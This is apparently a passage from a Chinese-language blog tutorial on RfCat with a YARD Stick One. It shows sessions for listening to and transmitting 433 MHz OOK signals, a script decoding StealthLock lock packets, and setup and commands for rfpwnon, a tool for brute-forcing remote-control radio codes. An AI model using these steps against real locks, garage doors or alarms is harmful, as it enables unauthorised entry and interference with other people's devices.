(0.003240 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003528 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003263 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003441 seconds)</span><br><span class="line">PING: 26 bytes transmitted, received: <span class="string">'ABCDEFGHIJKLMNOPQRSTUVWXYZ'</span> (0.003416 seconds)</span><br><span class="line">Out[2]: (10, 0, 0.03384900093078613)</span><br><span class="line"></span><br><span class="line">In [3]: d.setFreq(433000000) // 设置信号频段为 433 MHz</span><br><span class="line"></span><br><span class="line">In [4]: d.specan(433e6) // 频谱分析界面,433e6 设置的是频段,这里使用的写法是科学计数法等同于 433000000</span><br><span class="line"></span><br><span class="line">In [5]: bin(0x1234f) // 进制转换 十六进制转二进制</span><br><span class="line">Out[5]: <span class="string">'0b10010001101001111'</span></span><br><span class="line"></span><br><span class="line">In [6]: <span class="built_in">help</span>(d) // 查看所有参数的帮助</span><br><span class="line"></span><br><span class="line">In [7]: d. // 按 Tab 键,查看所有参数</span><br><span class="line">Display all 182 possibilities? (y or n)</span><br><span class="line">d.FHSSxmit d.getChannel d.mac_SyncCell d.rf_redirection d.setMdmNumPreamble</span><br><span class="line">d.RESET d.getChannels d.makePktFLEN d.rsema d.setMdmSyncMode</span><br><span class="line">d.RFcapture d.getCompilerInfo d.makePktVLEN d.runEP5_recv d.setMdmSyncWord</span><br><span class="line">d.RFdump d.getDebugCodes d.max_packet_size d.runEP5_send d.setModeIDLE</span><br><span class="line">d.RFlisten d.getEnableMdmDCFilter d.mhz d.run_ctrl d.setModeRX</span><br><span class="line">d.RFrecv d.getEnableMdmFEC d.nextChannel d.scan d.setModeTX</span><br><span class="line">d.RFtestLong d.getEnableMdmManchester d.peek d.send d.setPktAddr</span><br><span class="line">d.RFxmit d.getEnablePktAppendStatus d.ping d.send_thread d.setPktPQT</span><br><span class="line">d.RFxmitLong d.getEnablePktCRC d.poke d.send_threadcounter d.setPower</span><br><span class="line">d.adjustFreqOffset d.getEnablePktDataWhitening d.pokeReg d.setAESiv d.setRFRegister</span><br><span class="line">d.bootloader d.getFHSSstate d.printClientState d.setAESkey d.setRFbits</span><br><span class="line">d.calculateFsIF d.getFreq d.printRadioConfig d.setAESmode d.setRFparameters</span><br><span class="line">d.calculateFsOffset d.getFreqEst d.printRadioState d.setAmpMode d.setRadioConfig</span><br><span class="line">d.calculateMdmDeviatn d.getFsIF d.radiocfg d.setBSLimit d.setRfMode</span><br><span class="line">d.calculatePktChanBW d.getFsOffset d.recv d.setChannel d.setup</span><br><span class="line">d.changeChannel d.getInterruptRegisters d.recvAll d.setChannels d.setup24330MHz</span><br><span class="line">d.checkRepr d.getLQI d.recv_event d.setEnDeCoder d.setup900MHz</span><br><span class="line">d.chipnum d.getMACdata d.recv_mbox d.setEnableCCA d.setup900MHzContTrans</span><br><span class="line">d.chipstr d.getMACthreshold d.recv_queue d.setEnableMdmDCFilter d.setup900MHzHopTrans</span><br><span class="line">d.cleanup d.getMARCSTATE d.recv_thread d.setEnableMdmFEC d.setup_rfstudio_902PktTx</span><br><span class="line">d.clearDebugCodes d.getMdmChanBW d.recv_threadcounter d.setEnableMdmManchester d.specan</span><br><span class="line">d.ctrl_thread d.getMdmChanSpc d.reprAESMode d.setEnablePktAppendStatus d.startHopping</span><br><span class="line">d.debug d.getMdmDRate d.reprClientState d.setEnablePktCRC d.stopHopping</span><br><span class="line">d.devnum d.getMdmDeviatn d.reprDebugCodes d.setEnablePktDataWhitening d.strobeModeCAL</span><br><span class="line">d.discover d.getMdmModulation d.reprFreqConfig d.setFHSSstate d.strobeModeFSTXON</span><br><span class="line">d.endec d.getMdmNumPreamble d.reprHardwareConfig d.setFreq d.strobeModeIDLE</span><br><span class="line">d.ep0GetAddr d.getMdmSyncMode d.reprMACdata d.setFsIF d.strobeModeRX</span><br><span class="line">d.ep0Peek d.getMdmSyncWord d.reprMdmModulation d.setFsOffset d.strobeModeReturn</span><br><span class="line">d.ep0Ping d.getPartNum d.reprModemConfig d.setMACdata d.strobeModeTX</span><br><span class="line">d.ep0Poke d.getPktAddr d.reprPacketConfig d.setMACperiod d.testTX</span><br><span class="line">d.ep0Reset d.getPktLEN d.reprRadioConfig d.setMACthreshold d.trash</span><br><span class="line">d.ep5timeout d.getPktPQT d.reprRadioState d.setMaxPower d.xmit_event</span><br><span class="line">d.freq_offset_accumulator d.getRSSI d.reprRadioTestSignalConfig d.setMdmChanBW d.xmit_queue</span><br><span class="line">d.getAESmode d.getRadioConfig d.reprSoftwareConfig d.setMdmChanSpc d.xsema</span><br><span class="line">d.getAmpMode d.idx d.reset_event d.setMdmDRate</span><br><span class="line">d.getBSLimit d.lowball d.resetup d.setMdmDeviatn</span><br><span class="line">d.getBuildInfo d.lowballRestore d.rf_configure d.setMdmModulation</span><br><span class="line"></span><br><span class="line">In [10]: d.</span><br></pre></td></tr></table></figure><h3 id="1-5-接收信号"><a href="#1-5-接收信号" class="headerlink" title="1.5 接收信号"></a>1.5 接收信号</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'RfCat, the greatest thing since Frequency Hopping!'</span></span><br><span class="line"></span><br><span class="line">Research Mode: enjoy the raw power of rflib</span><br><span class="line"></span><br><span class="line">currently your environment has an object called <span class="string">"d"</span> <span class="keyword">for</span> dongle. this is how</span><br><span class="line">you interact with the rfcat dongle:</span><br><span class="line"> >>> d.ping()</span><br><span class="line"> >>> d.setFreq(433000000)</span><br><span class="line"> >>> d.setMdmModulation(MOD_ASK_OOK)</span><br><span class="line"> >>> d.makePktFLEN(250)</span><br><span class="line"> >>> d.RFxmit(<span class="string">"HALLO"</span>)</span><br><span class="line"> >>> d.RFrecv()</span><br><span class="line"> >>> <span class="built_in">print</span> d.reprRadioConfig()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">In [1]: d.setFreq(433800000) // 设置信号频段为 433.8 MHz</span><br><span class="line"></span><br><span class="line">In [2]: d.setMdmModulation(MOD_ASK_OOK) // 设置信号调制模式为 ASK / OOK</span><br><span class="line"></span><br><span class="line">In [3]: d.setMdmDRate(4800) // </span><br><span class="line"></span><br><span class="line">In [4]: d.setMaxPower()</span><br><span class="line"></span><br><span class="line">In [5]: d.lowball()</span><br><span class="line"></span><br><span class="line">In [6]: d.RFlisten() // 开始监听数据</span><br><span class="line">Entering RFlisten mode... packets arriving will be displayed on the screen</span><br><span class="line">(press Enter to stop)</span><br><span class="line">(1495207873.725) Received: 80004405072024210db80100080041004098760290020241482206c3b000014bc18c000000280360200b0f20281b0f60000000000088490f23d9f2004140969ea0900433f930088290b0118028e48430540183f04010843c800180008c82840004042021000000000004c640020a43c0120ec1c4010010200000606c7c012168295b50084318f00000040a028242c8e428126200481100000031c838004151a000c2080081012800081800001e40000006405c120a00928420c2c8681843040a180000000000000016c000020646c0080000084040400000000000063e0000020200909206ae1000103f68540220e5bd05a06cfa10023616b040 | [email protected]<span class="string">".....K.....(.`....(..`......I.#[email protected]......(..0T...@..<[email protected]...........`l|.!h)[P.C........B..(.b.H....1.8.AQ.......(......@...@\........h.C...............F.....@@@......>............?hT......l...6..@</span></span><br><span class="line"><span class="string">(1495207875.830) Received: 5322e404212004130000202300186020000000bc31842044218000120008410000100800400020000048681fb780010027008000002200002c3c9e0001008002c0c83a164240620ec5c0c61006000000000012044148740840025810c0000040039b043000000000043d8441484008488842000013e8180a6368e90b43000021200400000000000521ac50400140084200000000000014020500c87a04c01200b3c0060000040025150b2aa020000080c20a2212c00000000063e0310f7338290f63565e984840884b0f40d80a0040000002c200000008000202029252824000028604100000f750c200000000382d842003bf8400200056c0d0 | S"</span>..!......<span class="comment">#..`[email protected].....'...."..,<........:[email protected][email protected][email protected][email protected]..!........!.P@[email protected]...........%..*......."......c.1.s8).cV^[email protected].@[email protected][email protected]..</span></span><br><span class="line">(1495207876.325) Received: b1a435883185958430057439c60e10c00001000010f0000000420251400212400040ccc20050000000173d8ea1143983b0f43d8490840040a10c00020000010f20a02b17404c7b0f434801001a2c2100000000004020794f43d8da14c7d1046187258c0000008000041d8e21ec256200040402210c21eda18400400000000f23e83b0f43d87a3c218ba58422000000000c2d87a06c6d0820241d0b631821c7050800000000031763e85b0f73f0c150d610c21ee610c00783b1fcf63ec639be75c2b1fc3c87b9ec2d87b0c01002063010800000000010d63e8790f43d829010118031839d843000000091fc1d83b1f73d85a1ec7d0ce1ec63811f | ..5.1...0.t9.............B.Q@..@[email protected]....=...9...=....@..........+.@L{.CH...,[email protected].%.........!.%b....!.!....@....<span class="comment">#.;.C.z<!...".....-..lm..$..c.!.........c.[.s..P............>.9.u...<...-......0........>...=.....1...0.........=...}...c..</span></span><br><span class="line">(1495207877.241) Received: e0240400212c0004010f3c042000000000187a0b43d8fb1fdfc8fa1ec23387688d60000000000808010004880020244c0120000029210800080000000321e86d17a1ec1d0f21e42000326520000002000020a005010020001020e40000200874802000008000080485e02011036120040021842112908400000000018fa1e43d8fa3f8e3e863087de4204000000000110000000000004f63ffe3ecf90f63a84100490882000000000043d80b998000281042985b08431e2808000000000018fe1ec3c08202c04006004280c0ee820000000000243e8790f6024550361e87b28610f790c20004000000c2d8fa1ec3b1b1fce61ec2100182063000 | .$..!,....<.......z.C........3.h.`............<span class="variable">$L</span>....)!.......!.m.....!...2e....................t.............a...!.!...........=.....c.}[email protected].....(.B.[.C.([email protected].........$>....EP6............................0.</span><br><span class="line">(1495207877.706) Received: ff5f63840c81b09433801085b480000000010004048082a0048080f43fafb18c21ef829800000000060e87d0f63eced8fa1ed3c63ef63182b0b6220290863a8210101080008600a000000000000000acb0100284905000801083bfd6b0000000000650d61ec7c0f21245c01a04c0020020000000040010503c8798f43d87b1f420801007be8630000000013d0f6bf86c7d0fa1fc733f4ba80282f65ac7d0f9100058b81042109614040002000010b2020480801241d082048210c3dec710000000029aed7bfb1fbe1ec2dc4218fbc841000400000047d8721e47f0f43c7b586309690000000000000001092002030120a8e10720040125a10c00 | ._c.....3...................?...!............>......>.1...<span class="string">"...:......................P............P......E.............P<...=.........0....=.k.l}...s?K....Z.....X..B...............A...............{......B...A.....G.r.G..<{Xc.i....................%...</span></span><br></pre></td></tr></table></figure><h3 id="1-5-发送-OOK-信号"><a href="#1-5-发送-OOK-信号" class="headerlink" title="1.5 发送 OOK 信号"></a>1.5 发送 OOK 信号</h3><p>方法一</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'RfCat, the greatest thing since Frequency Hopping!'</span></span><br><span class="line"></span><br><span class="line">Research Mode: enjoy the raw power of rflib</span><br><span class="line"></span><br><span class="line">currently your environment has an object called <span class="string">"d"</span> <span class="keyword">for</span> dongle. this is how</span><br><span class="line">you interact with the rfcat dongle:</span><br><span class="line"> >>> d.ping()</span><br><span class="line"> >>> d.setFreq(433000000)</span><br><span class="line"> >>> d.setMdmModulation(MOD_ASK_OOK)</span><br><span class="line"> >>> d.makePktFLEN(250)</span><br><span class="line"> >>> d.RFxmit(<span class="string">"HALLO"</span>)</span><br><span class="line"> >>> d.RFrecv()</span><br><span class="line"> >>> <span class="built_in">print</span> d.reprRadioConfig()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">In [1]: d.setFreq(433e6) // 设置信号频段为 433 MHz</span><br><span class="line"></span><br><span class="line">In [2]: d.setMdmModulation(MOD_ASK_OOK) // 设置信号调制模式为 ASK / OOK</span><br><span class="line"></span><br><span class="line">In [3]: d.setMdmDRate(int(1.0/0.000550)) // </span><br><span class="line"></span><br><span class="line">In [4]: d.RFxmit(<span class="string">"\x8E\x8E\x88\x88\x8E\x88\x88\x00\x00\x00"</span> * 20) // 发送十六进制编码的信号 <span class="string">"\x8E\x8E\x88\x88\x8E\x88\x88\x00\x00\x00"</span> 20次</span><br></pre></td></tr></table></figure><p>方法二</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">'RfCat, the greatest thing since Frequency Hopping!'</span></span><br><span class="line"></span><br><span class="line">Research Mode: enjoy the raw power of rflib</span><br><span class="line"></span><br><span class="line">currently your environment has an object called <span class="string">"d"</span> <span class="keyword">for</span> dongle. this is how</span><br><span class="line">you interact with the rfcat dongle:</span><br><span class="line"> >>> d.ping()</span><br><span class="line"> >>> d.setFreq(433000000)</span><br><span class="line"> >>> d.setMdmModulation(MOD_ASK_OOK)</span><br><span class="line"> >>> d.makePktFLEN(250)</span><br><span class="line"> >>> d.RFxmit(<span class="string">"HALLO"</span>)</span><br><span class="line"> >>> d.RFrecv()</span><br><span class="line"> >>> <span class="built_in">print</span> d.reprRadioConfig()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">In [1]: d.setFreq(433800000) // 设置信号频段为 433.8 MHz</span><br><span class="line"></span><br><span class="line">In [2]: d.setMdmModulation(MOD_ASK_OOK) // 设置信号调制模式为 ASK / OOK</span><br><span class="line"></span><br><span class="line">In [3]: d.makePktFLEN(4) // 设置包长度为 4 以为我们这里只发送 4 bytes</span><br><span class="line"></span><br><span class="line">In [4]: d.setMdmDRate(4800) // 设置波特率</span><br><span class="line"></span><br><span class="line">In [5]: d.setMaxPower()</span><br><span class="line"></span><br><span class="line">In [6]: <span class="keyword">for</span> i <span class="keyword">in</span> range(0,15):d.RFxmit(<span class="string">'\xDE\xAD\xBE\xEF'</span>) // 重复发送 15 次数据</span><br></pre></td></tr></table></figure><h3 id="1-6-使用-Python-脚本"><a href="#1-6-使用-Python-脚本" class="headerlink" title="1.6 使用 Python 脚本"></a>1.6 使用 Python 脚本</h3><p>Python 脚本</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># Ths is a rudimentary implementation of packet reception using YARD Stick One</span></span><br><span class="line"><span class="comment"># with RfCat demonstrated in Rapid Radio Reversing presented at ToorCon 17</span></span><br><span class="line"><span class="comment"># (2015).</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># File Name: sl.py</span></span><br><span class="line"><span class="comment"># usage from rfcat interactive shell:</span></span><br><span class="line"><span class="comment"># %run sl.py</span></span><br><span class="line"><span class="comment"># rxsl(d)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> rflib <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="comment"># This validity check is only verifying certain bytes that are present in all</span></span><br><span class="line"><span class="comment"># packets. It really should be followed up (or replaced) by a checksum</span></span><br><span class="line"><span class="comment"># verification.</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">packet_valid</span><span class="params">(p)</span>:</span></span><br><span class="line"><span class="keyword">if</span> ord(p[<span class="number">0</span>]) != <span class="number">0x6d</span>:</span><br><span class="line"><span class="keyword">return</span> <span class="keyword">False</span></span><br><span class="line"><span class="keyword">if</span> ord(p[<span class="number">1</span>]) != <span class="number">0xb6</span>:</span><br><span class="line"><span class="keyword">return</span> <span class="keyword">False</span></span><br><span class="line"><span class="keyword">if</span> ord(p[<span class="number">6</span>]) != <span class="number">0x6d</span>:</span><br><span class="line"><span class="keyword">return</span> <span class="keyword">False</span></span><br><span class="line"><span class="keyword">if</span> ord(p[<span class="number">7</span>]) != <span class="number">0xb6</span>:</span><br><span class="line"><span class="keyword">return</span> <span class="keyword">False</span></span><br><span class="line"><span class="keyword">if</span> (ord(p[<span class="number">29</span>]) & <span class="number">0xfc</span>) != <span class="number">0</span>:</span><br><span class="line"><span class="keyword">return</span> <span class="keyword">False</span></span><br><span class="line"><span class="keyword">return</span> <span class="keyword">True</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># This could probably be simpler and/or easier to read. It extracts every</span></span><br><span class="line"><span class="comment"># third bit in order to decode the pulse width modulation (PWM). The PWM</span></span><br><span class="line"><span class="comment"># implemented by StealthLock is well behaved in that the pulse durations and</span></span><br><span class="line"><span class="comment"># interval durations are all one or two times the length of a time unit and</span></span><br><span class="line"><span class="comment"># data bits are represented by a consistent number (3) of time units. This is</span></span><br><span class="line"><span class="comment"># the time unit I have used in the RfCat symbol rate configuration, so a long</span></span><br><span class="line"><span class="comment"># pulse appears as symbols (1, 1, 0) and a short pulse appears as (1, 0, 0).</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pwm_decode</span><span class="params">(p)</span>:</span></span><br><span class="line">biginteger = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> byte <span class="keyword">in</span> p:</span><br><span class="line">biginteger <<= <span class="number">8</span></span><br><span class="line">biginteger |= ord(byte)</span><br><span class="line">biginteger >>= <span class="number">12</span></span><br><span class="line">out = <span class="number">0</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">28</span>, (len(p)*<span class="number">8</span><span class="number">-12</span>)/<span class="number">3</span>, <span class="number">1</span>):</span><br><span class="line">out <<= <span class="number">1</span></span><br><span class="line">out |= ((biginteger & <span class="number">1</span>) ^ <span class="number">1</span>)</span><br><span class="line">biginteger >>=<span class="number">3</span></span><br><span class="line"><span class="keyword">return</span> out</span><br><span class="line"></span><br><span class="line"><span class="comment"># checksum byte is 0xff minus 8-bit addition of previous bytes, like so:</span></span><br><span class="line"><span class="comment"># hex(0xff-(0x02+0x98+0x76+0xff+0xff)&0xff)</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">rxsl</span><span class="params">(device)</span>:</span> <span class="comment"># 函数方法</span></span><br><span class="line">device.setFreq(<span class="number">314980000</span>)</span><br><span class="line">device.setMdmModulation(MOD_ASK_OOK)</span><br><span class="line">device.setMdmDRate(<span class="number">2450</span>)</span><br><span class="line">device.setPktPQT(<span class="number">0</span>)</span><br><span class="line">device.setMdmSyncMode(<span class="number">2</span>)</span><br><span class="line">device.setMdmSyncWord(<span class="number">0x06db</span>)</span><br><span class="line">device.setMdmNumPreamble(<span class="number">0</span>)</span><br><span class="line">device.setMaxPower()</span><br><span class="line">device.lowball()</span><br><span class="line">device.makePktFLEN(<span class="number">30</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="keyword">not</span> keystop():</span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">pkt, ts = device.RFrecv()</span><br><span class="line"><span class="keyword">if</span> packet_valid(pkt):</span><br><span class="line"><span class="comment">#print "Received: %s" % pkt.encode('hex')</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">"0x%012x"</span> % pwm_decode(pkt)</span><br><span class="line"><span class="keyword">except</span> ChipconUsbTimeoutException:</span><br><span class="line"><span class="keyword">pass</span></span><br><span class="line">sys.stdin.read(<span class="number">1</span>)</span><br></pre></td></tr></table></figure><p>在 RfCat 命令行内调用</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># rfcat -r</span></span><br><span class="line"><span class="string">'RfCat, the greatest thing since Frequency Hopping!'</span></span><br><span class="line"></span><br><span class="line">Research Mode: enjoy the raw power of rflib</span><br><span class="line"></span><br><span class="line">currently your environment has an object called <span class="string">"d"</span> <span class="keyword">for</span> dongle. this is how</span><br><span class="line">you interact with the rfcat dongle:</span><br><span class="line"> >>> d.ping()</span><br><span class="line"> >>> d.setFreq(433000000)</span><br><span class="line"> >>> d.setMdmModulation(MOD_ASK_OOK)</span><br><span class="line"> >>> d.makePktFLEN(250)</span><br><span class="line"> >>> d.RFxmit(<span class="string">"HALLO"</span>)</span><br><span class="line"> >>> d.RFrecv()</span><br><span class="line"> >>> <span class="built_in">print</span> d.reprRadioConfig()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">In [1]: %run sl.py // 运行 sl.py 脚本</span><br><span class="line"></span><br><span class="line">In [2]: rxsl(d) // 使用脚本内的方法</span><br></pre></td></tr></table></figure><h2 id="2-rfpwnon-信号暴力穷举"><a href="#2-rfpwnon-信号暴力穷举" class="headerlink" title="2. rfpwnon 信号暴力穷举"></a>2. rfpwnon 信号暴力穷举</h2><p><a href="https://github.com/exploitagency/github-rfpwnon" target="_blank" rel="noopener">rfpwnon</a> 是一款基于 rfcat 实现的的无线电信号暴力穷举攻击的 Python 脚本</p><h3 id="2-1-安装"><a href="#2-1-安装" class="headerlink" title="2.1 安装"></a>2.1 安装</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">apt-get install python python-pip rfcat</span><br><span class="line">pip install bitstring</span><br><span class="line">wget https://raw.githubusercontent.com/exploitagency/github-rfpwnon/master/rfpwnon.py</span><br><span class="line">./rfpwnon.py --<span class="built_in">help</span></span><br></pre></td></tr></table></figure><h3 id="2-2-帮助信息"><a href="#2-2-帮助信息" class="headerlink" title="2.2 帮助信息"></a>2.2 帮助信息</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># ./rfpwnon.py -h</span></span><br><span class="line">usage: rfpwnon.py [-h] [-v] [-f BASEFREQ] [-b BAUDRATE] [-l BINLENGTH]</span><br><span class="line"> [-r REPEATTIMES] [--keys] [-p PPAD] [-t TPAD] [--raw]</span><br><span class="line"> [--tri] [--show]</span><br><span class="line"></span><br><span class="line">Application to use a rfcat compatible device to brute force a particular AM</span><br><span class="line">OOK or raw binary signal.</span><br><span class="line"></span><br><span class="line">optional arguments:</span><br><span class="line"> -h, --<span class="built_in">help</span> show this <span class="built_in">help</span> message and <span class="built_in">exit</span> // 显示帮助信息</span><br><span class="line"> -v, --version show program<span class="string">'s version number and exit // 显示软件版本</span></span><br><span class="line"><span class="string"> -f BASEFREQ Specify the target frequency to transmit on, default is // 指定信号频段,默认为 915000000 Hz</span></span><br><span class="line"><span class="string"> 915000000.</span></span><br><span class="line"><span class="string"> -b BAUDRATE Specify the baudrate of the signal, default is 2000. // 指定波特率,默认为 2000</span></span><br><span class="line"><span class="string"> -l BINLENGTH Specify the binary length of the signal to brute force. By // 指定要生成的二进制长度</span></span><br><span class="line"><span class="string"> default this is the binary length before pwm encoding. When</span></span><br><span class="line"><span class="string"> the flag --raw is set this is the binary length of the pwm</span></span><br><span class="line"><span class="string"> encoded signal.</span></span><br><span class="line"><span class="string"> -r REPEATTIMES Specify the number of times to repeat the signal. By default // 指定一个信号重复的次数</span></span><br><span class="line"><span class="string"> this is set to 1 and uses the de bruijn sequence for speed. // 当设为 1 时使用 de bruijn 序列的速度</span></span><br><span class="line"><span class="string"> When set greater than one the script sends each possible // 当设置大于 1 时脚本会花费更多的时间去执行</span></span><br><span class="line"><span class="string"> permutation of the signal individually and takes much longer</span></span><br><span class="line"><span class="string"> to complete. For some applications the signal is required to</span></span><br><span class="line"><span class="string"> be sent multiple times.</span></span><br><span class="line"><span class="string"> --keys Displays the values being transmitted in binary, hex, and // 显示正在传输的二进制,十六进制和十进制值</span></span><br><span class="line"><span class="string"> decimal both before and after pwm encoding.</span></span><br><span class="line"><span class="string"> -p PPAD Specify your own binary padding to be attached before the // 指定要附加在所生成二进制之前的固定二进制值</span></span><br><span class="line"><span class="string"> brute forced binary.</span></span><br><span class="line"><span class="string"> -t TPAD Specify your own binary padding to be attached after the // 指定要附加在所生成二进制之后的固定二进制值</span></span><br><span class="line"><span class="string"> brute forced binary.</span></span><br><span class="line"><span class="string"> --raw This flag disables the script from performing the pwm</span></span><br><span class="line"><span class="string"> encoding of the binary signal. When set you must specify the</span></span><br><span class="line"><span class="string"> full pwm encoded binary length using -l.</span></span><br><span class="line"><span class="string"> --tri This flag sets up the script to brute force a trinary</span></span><br><span class="line"><span class="string"> signal.</span></span><br><span class="line"><span class="string"> --show Prints de Bruijn sequence before transmitting. // 显示 de Bruijn 序列</span></span><br></pre></td></tr></table></figure><h3 id="2-3-使用实例"><a href="#2-3-使用实例" class="headerlink" title="2.3 使用实例"></a>2.3 使用实例</h3><p>指定波特率为 <code>2000</code> 生成 <code>4</code> 位长的所有二进制信号,每个信号重复发送 <code>5</code> 次</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./rfpwnon.py -f 315000000 -b 2000 -l 4 -r 5</span><br></pre></td></tr></table></figure><p>指定波特率为 <code>1818</code> 每个信号的开头的二进制编码为 <code>100101</code> 在其之后生成 <code>10</code> 为长的所有二进制信号,每个信号重复发送 <code>2</code> 次</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./rfpwnon.py -f 315060000 -b 1818 -p 100101 -l 10 -r 2</span><br></pre></td></tr></table></figure><p>指定波特率为 <code>1818</code> 生成 <code>16</code> 为长的所有二进制信号,每个信号重复发送 <code>2</code> 